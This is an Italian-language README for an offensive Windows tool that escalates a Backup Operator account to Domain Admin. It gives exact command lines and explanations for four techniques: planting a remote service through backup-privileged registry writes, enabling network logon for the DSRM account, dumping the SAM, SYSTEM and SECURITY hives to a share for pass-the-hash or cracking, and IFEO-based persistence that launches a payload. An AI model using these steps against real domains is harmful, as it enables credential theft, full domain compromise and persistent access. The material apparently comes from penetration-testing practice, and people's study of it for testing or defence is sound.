
Esegui l'escalation da Backup Operator a Domain Admin utilizzando quattro tecniche: creazione di servizi remoti, manipolazione del registro DSRM, dump degli hive SAM/SYSTEM e persistenza IFEO per movimento laterale ed escalation dei privilegi.
BackupOperatorToolkit (BOT) ha 4 modalità diverse che consentono di elevare i privilegi da Backup Operator a Domain Admin.
Usare "runas.exe /netonly /user:domain.dk\backupoperator powershell.exe" prima di eseguire lo strumento.
La modalità SERVICE crea un servizio sull'host remoto che verrà eseguito al riavvio dell'host.
Il servizio viene creato modificando il registro remoto. Ciò è possibile passando il valore "REG_OPTION_BACKUP_RESTORE" a RegOpenKeyExA e RegSetValueExA.
Non è possibile far eseguire immediatamente il servizio poiché il database del gestore del controllo servizi "SERVICES_ACTIVE_DATABASE" viene caricato in memoria all'avvio e può essere modificato solo con privilegi di amministratore locale, che l'Operatore Backup non possiede.
.\BackupOperatorToolkit.exe SERVICE \\PATH\To\Service.exe \\TARGET.DOMAIN.DK SERVICENAME DISPLAYNAME DESCRIPTION

La modalità DSRM imposta la chiave di registro DsrmAdminLogonBehavior situata in "HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" su 0, 1 o 2.
Impostando il valore su 0 si consentirà l'uso dell'account DSRM solo quando si è in modalità ripristino.
Impostando il valore su 1 si consentirà l'uso dell'account DSRM quando il servizio Directory Services è arrestato e NTDS è sbloccato.
Impostando il valore su 2 si consentirà l'uso dell'account DSRM con autenticazione di rete come WinRM.
Se la modalità DUMP è stata utilizzata e l'account DSRM è stato violato offline, impostare il valore su 2 e accedere al Domain Controller con l'account DSRM che sarà amministratore locale.
.\BackupOperatorToolkit.exe DSRM \\TARGET.DOMAIN.DK 0||1||2

La modalità DUMP esporta i hive SAM, SYSTEM e SECURITY in un percorso locale sull'host remoto o carica i file su una condivisione di rete.
Una volta esportati i hive, è possibile eseguire Pass-the-Hash con l'hash del Domain Controller, violare DSRM e abilitare l'autenticazione di rete, o eventualmente autenticarsi con un altro account trovato negli esportati. Potrebbero essere presenti account di altre foreste in questi file; non sono sicuro del perché, ma ciò è stato osservato in incarichi con foreste di gestione.
Questa modalità è ispirata al progetto BackupOperatorToDA.
.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK

La modalità IFEO (Image File Execution Options) consente di eseguire un'applicazione quando un processo specifico viene terminato.
Ciò potrebbe fornire una shell prima della modalità SERVICE nel caso in cui l'host di destinazione sia pesantemente utilizzato e raramente riavviato.
L'eseguibile verrà eseguito come figlio del processo WerFault.exe.
.\BackupOperatorToolkit.exe IFEO notepad.exe \\Path\To\pwn.exe \\TARGET.DOMAIN.DK



